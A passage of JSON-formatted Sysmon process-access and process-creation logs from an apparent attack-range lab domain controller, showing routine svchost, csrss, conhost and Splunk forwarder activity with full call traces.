05:48:42.184","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3294,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.184\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.184","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3295,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.184\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.184","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3296,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.199\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023A-5F25-0000-001019300500}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.199","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023A-5F25-0000-001019300500}","TargetProcessId":"4368","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3297,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.206\r\nProcessGuid: {A837DB8D-023A-5F25-0000-00104E310500}\r\nProcessId: 4500\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" generate-ssl\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-023A-5F25-0000-001019300500}\r\nParentProcessId: 4368\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.206","ProcessGuid":"{A837DB8D-023A-5F25-0000-00104E310500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" generate-ssl","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-023A-5F25-0000-001019300500}","ParentProcessId":"4368","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3298,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.199\r\nSourceProcessGUID: {A837DB8D-023A-5F25-0000-001019300500}\r\nSourceProcessId: 4368\r\nSourceThreadId: 3288\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {A837DB8D-023A-5F25-0000-00104E310500}\r\nTargetProcessId: 4500\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1803d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.199","SourceProcessGUID":"{A837DB8D-023A-5F25-0000-001019300500}","SourceProcessId":"4368","SourceThreadId":"3288","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{A837DB8D-023A-5F25-0000-00104E310500}","TargetProcessId":"4500","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1803d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3299,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.199\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023A-5F25-0000-00104E310500}\r\nTargetProcessId: 4500\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.199","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023A-5F25-0000-00104E310500}","TargetProcessId":"4500","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3300,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.199\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.199","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3301,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.199\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.199","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3302,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.199\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 